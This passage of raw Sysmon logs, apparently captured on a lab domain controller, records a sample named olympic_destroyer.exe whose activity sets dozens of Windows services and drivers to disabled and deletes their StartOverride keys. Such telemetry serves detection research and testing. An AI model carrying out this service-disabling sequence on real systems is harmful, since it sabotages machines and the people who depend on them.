10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ebdrv\ImagePath\SystemRoot\System32\drivers\evbda.sys 12241200x8000000000000000290443Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ebdrv\StartOverride 13241300x8000000000000000290442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ebdrv\StartDWORD (0x00000004) 13241300x8000000000000000290441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Eaphost\StartDWORD (0x00000004) 13241300x8000000000000000290440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DXGKrnl\StartDWORD (0x00000004) 13241300x8000000000000000290439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DsSvc\StartDWORD (0x00000004) 10341000x8000000000000000290438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.766{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6505-000000003802}6300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.766{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6505-000000003802}6300C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DsRoleSvc\StartDWORD (0x00000004) 13241300x8000000000000000290435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DsmSvc\StartDWORD (0x00000004) 13241300x8000000000000000290434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\dot3svc\StartDWORD (0x00000004) 13241300x8000000000000000290433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Dnscache\StartDWORD (0x00000004) 13241300x8000000000000000290432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DNS\StartDWORD (0x00000004) 13241300x8000000000000000290431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\dmwappushservice\StartDWORD (0x00000004) 13241300x8000000000000000290430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\dmvsc\StartDWORD (0x00000004) 13241300x8000000000000000290429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DmEnrollmentSvc\StartDWORD (0x00000004) 13241300x8000000000000000290428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Disk\ImagePath\SystemRoot\System32\drivers\disk.sys 13241300x8000000000000000290427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Disk\StartDWORD (0x00000004) 13241300x8000000000000000290426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DiagTrack\StartDWORD (0x00000004) 13241300x8000000000000000290425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\diagnosticshub.standardcollector.service\StartDWORD (0x00000004) 13241300x8000000000000000290424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Dhcp\StartDWORD (0x00000004) 13241300x8000000000000000290423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DfsrRo\ImagePath\SystemRoot\system32\drivers\dfsrro.sys 13241300x8000000000000000290422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DfsrRo\StartDWORD (0x00000004) 13241300x8000000000000000290421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DFSR\StartDWORD (0x00000004) 13241300x8000000000000000290420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DfsDriver\StartDWORD (0x00000004) 13241300x8000000000000000290419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Dfsc\StartDWORD (0x00000004) 13241300x8000000000000000290418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Dfs\StartDWORD (0x00000004) 13241300x8000000000000000290417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DevQueryBroker\StartDWORD (0x00000004) 13241300x8000000000000000290416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.766{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DeviceInstall\StartDWORD (0x00000004) 10341000x8000000000000000290415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.766{C8EA50B7-12EA-6216-6505-000000003802}63006344C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.765{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\defragsvc\StartDWORD (0x00000004) 13241300x8000000000000000290413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.764{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DcpSvc\StartDWORD (0x00000004) 13241300x8000000000000000290412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.764{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\dam\StartDWORD (0x00000004) 13241300x8000000000000000290411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.763{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CscService\StartDWORD (0x00000004) 13241300x8000000000000000290410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.762{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CSC\StartDWORD (0x00000004) 13241300x8000000000000000290409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.762{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CryptSvc\StartDWORD (0x00000004) 13241300x8000000000000000290408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.761{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\condrv\StartDWORD (0x00000004) 13241300x8000000000000000290407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.761{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\COMSysApp\StartDWORD (0x00000004) 22542200x8000000000000000290406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:41.250{C8EA50B7-12E6-6216-4B05-000000003802}6792255.255.255.2550255.255.255.255;C:\Temp\olympic_destroyer.exe 13241300x8000000000000000290405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.760{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CompositeBus\StartDWORD (0x00000004) 13241300x8000000000000000290404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\cnghwassist\StartDWORD (0x00000004) 13241300x8000000000000000290403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CNG\ImagePath\SystemRoot\System32\Drivers\cng.sys 13241300x8000000000000000290402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CNG\StartDWORD (0x00000004) 13241300x8000000000000000290401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CmBatt\StartDWORD (0x00000004) 13241300x8000000000000000290400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\clreg\StartDWORD (0x00000004) 13241300x8000000000000000290399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\cht4vbd\StartDWORD (0x00000004) 13241300x8000000000000000290398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\cht4iscsi\StartDWORD (0x00000004) 13241300x8000000000000000290397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\cfn-hup\StartDWORD (0x00000004) 13241300x8000000000000000290396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\cdrom\StartDWORD (0x00000004) 13241300x8000000000000000290395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPSvc\StartDWORD (0x00000004) 13241300x8000000000000000290394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\cdfs\StartDWORD (0x00000004) 13241300x8000000000000000290393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CapImg\StartDWORD (0x00000004) 13241300x8000000000000000290392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bxois\ImagePath\SystemRoot\System32\drivers\bxois.sys 12241200x8000000000000000290391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bxois\StartOverride 13241300x8000000000000000290390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bxois\StartDWORD (0x00000004) 13241300x8000000000000000290389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bxfcoe\ImagePath\SystemRoot\System32\drivers\bxfcoe.sys 12241200x8000000000000000290388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bxfcoe\StartOverride 13241300x8000000000000000290387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bxfcoe\StartDWORD (0x00000004) 13241300x8000000000000000290386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\buttonconverter\StartDWORD (0x00000004) 13241300x8000000000000000290385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bthserv\StartDWORD (0x00000004) 13241300x8000000000000000290384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Browser\StartDWORD (0x00000004) 13241300x8000000000000000290383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bowser\StartDWORD (0x00000004) 13241300x8000000000000000290382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\BFE\StartDWORD (0x00000004) 13241300x8000000000000000290381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bfadi\ImagePath\SystemRoot\System32\drivers\bfadi.sys 12241200x8000000000000000290380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bfadi\StartOverride 13241300x8000000000000000290379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bfadi\StartDWORD (0x00000004) 13241300x8000000000000000290378Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bfadfcoei\ImagePath\SystemRoot\System32\drivers\bfadfcoei.sys 12241200x8000000000000000290377Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bfadfcoei\StartOverride 13241300x8000000000000000290376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.745{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bfadfcoei\StartDWORD (0x00000004) 10341000x8000000000000000290375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.729{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6505-000000003802}6300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000290374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Beep\StartDWORD (0x00000004) 13241300x8000000000000000290373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bcmfn2\StartDWORD (0x00000004) 13241300x8000000000000000290372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\bcmfn\StartDWORD (0x00000004) 13241300x8000000000000000290371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\BasicRender\StartDWORD (0x00000004) 13241300x8000000000000000290370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\StartDWORD (0x00000004) 13241300x8000000000000000290369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\b06bdrv\ImagePath\SystemRoot\System32\drivers\bxvbda.sys 12241200x8000000000000000290368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\b06bdrv\StartOverride 13241300x8000000000000000290367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\b06bdrv\StartDWORD (0x00000004) 13241300x8000000000000000290366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AxInstSV\StartDWORD (0x00000004) 10341000x8000000000000000290365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.729{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6505-000000003802}6300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290364Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AWSNVMe\ImagePath\SystemRoot\System32\drivers\AWSNVMe.sys 13241300x8000000000000000290363Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AWSNVMe\StartDWORD (0x00000004) 13241300x8000000000000000290362Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AWSLiteAgent\StartDWORD (0x00000004) 13241300x8000000000000000290361Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Audiosrv\StartDWORD (0x00000004) 13241300x8000000000000000290360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AudioEndpointBuilder\StartDWORD (0x00000004) 13241300x8000000000000000290359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\atapi\ImagePath\SystemRoot\System32\drivers\atapi.sys 12241200x8000000000000000290358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\atapi\StartOverride 13241300x8000000000000000290357Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 